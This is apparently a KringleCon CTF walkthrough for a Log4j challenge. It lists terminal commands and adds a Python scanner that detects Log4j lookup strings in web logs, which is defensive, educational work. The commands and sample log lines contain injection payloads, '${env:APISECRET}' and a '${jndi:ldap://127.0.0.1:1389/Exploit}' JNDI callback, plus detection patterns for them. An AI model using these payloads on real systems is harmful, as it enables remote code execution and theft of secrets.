Bonus! Blue Log4Jack
Details
- Location: North Pole
- Elf: Bow Ninecandle
Troll's Objective Message
Well hello! I'm Bow Ninecandle! Sorry I'm late to KringleCon; I got delayed by this other... thing. Say, would you be interested in taking a look? We're trying to defend the North Pole systems from the Yule Log4Jack vulnerability. This terminal has everything you need to get going, and it'll walk you through the process. Go ahead and give it a try! No previous experience with Log4j required. We'll even supply a checker script in the terminal for vulnerable libraries that you could use in your own environment. The talk Prof. Petabyte is giving will be helpful too! Oh, and don't worry if this doesn't show up in your badge. This is just a fun extra!
This terminal is located at the North Pole. The challenge walks you through understanding the Log4j vulnerability and tells you what to do at each step, but in case you need additional help, here are the commands to type in the terminal:
yes
next
ls
cd vulnerable
ls
cat DisplayFilev1.java
javac DisplayFilev1.java
java DisplayFilev1 testfile.txt
java DisplayFilev1 testfile2.txt
next
cat DisplayFilev2.java
next
javac DisplayFilev2.java
java DisplayFilev2 testfile2.txt
next
java DisplayFilev2 '${java:version}'
java DisplayFilev2 '${env:APISECRET}'
next
startserver.sh
java DisplayFilev2 '${jndi:ldap://127.0.0.1:1389/Exploit}'
Ctrl-C
cd ~/patched/
ls
source classpath.sh
javac DisplayFilev2.java
java DisplayFilev2 '${java:version}'
cd
log4j2-scan vulnerable/
log4j2-scan patched/
log4j2-scan /var/www/solr
next
ls /var/log/www
cat logshell-search.sh
logshell-search.sh /var/log/www
logshell-search.sh /var/log/www | sed '1!d'
logshell-search.sh /var/log/www | sed '2!d'
logshell-search.sh /var/log/www | sed '3!d'
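
The last step searches the web logs for Log4j lookup strings. The Python below is an added example, not part of the original walkthrough and not the contents of logshell-search.sh. It shows one way to do that kind of search for the lookups used above (jndi, env, java), including percent-encoded forms. The function names and the sample log lines are constructed, and it assumes combined-format access logs with the client address as the first field.

```python
import re
from urllib.parse import unquote

# Lookup prefixes that appear in this walkthrough: jndi, env, java.
LOOKUP = re.compile(r"\$\{(jndi|env|java):([^}\s]*)\}", re.IGNORECASE)
# For jndi lookups, split "ldap://host:port/path" into scheme and host:port.
JNDI_TARGET = re.compile(r"^(\w+)://([^/]+)")

def decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded strings are also caught."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_lines(lines):
    """Return one finding per lookup string seen in the given log lines."""
    findings = []
    for lineno, raw in enumerate(lines, start=1):
        line = decode_fully(raw)
        client = raw.split(" ", 1)[0]  # assumed: client address is field one
        for kind, arg in LOOKUP.findall(line):
            target = JNDI_TARGET.match(arg) if kind.lower() == "jndi" else None
            findings.append({
                "line": lineno,
                "client": client,
                "lookup": kind.lower(),
                "argument": arg,
                # Host the logging server would have been told to contact.
                "callback": target.group(2) if target else None,
            })
    return findings

# Constructed sample access-log lines (documentation addresses, not real data).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [24/Dec/2021:10:00:07 +0000] "GET /solr/ HTTP/1.1" 200 128 "-" "${jndi:ldap://127.0.0.1:1389/Exploit}"',
    '192.0.2.44 - - [24/Dec/2021:10:00:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A1389%2FExploit%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '192.0.2.51 - - [24/Dec/2021:10:01:30 +0000] "GET /?x=%2524%257Benv%253AAPISECRET%257D HTTP/1.1" 200 64 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG):
        print(finding)
```

The callback field is the useful pivot for response: any host listed there is one to check outbound connection logs for.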